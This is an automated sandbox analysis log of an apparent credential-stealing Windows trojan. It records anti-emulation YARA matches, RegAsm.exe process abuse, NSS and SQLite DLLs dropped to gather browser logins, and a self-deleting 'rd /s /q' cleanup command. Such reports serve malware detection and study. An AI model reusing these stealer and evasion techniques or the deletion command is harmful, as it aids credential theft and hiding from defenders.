                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C817030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C817030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,2_2_004106C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: HDGIJJ.2.dr, FCGCGD.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
                  Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: sqlx[1].dll.2.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB5CE8 push ecx; ret 0_2_00AB5CFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret 2_2_004191E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB536 push ecx; ret 2_2_6C7EB549
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FCGCGDHJEGHJ\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetPro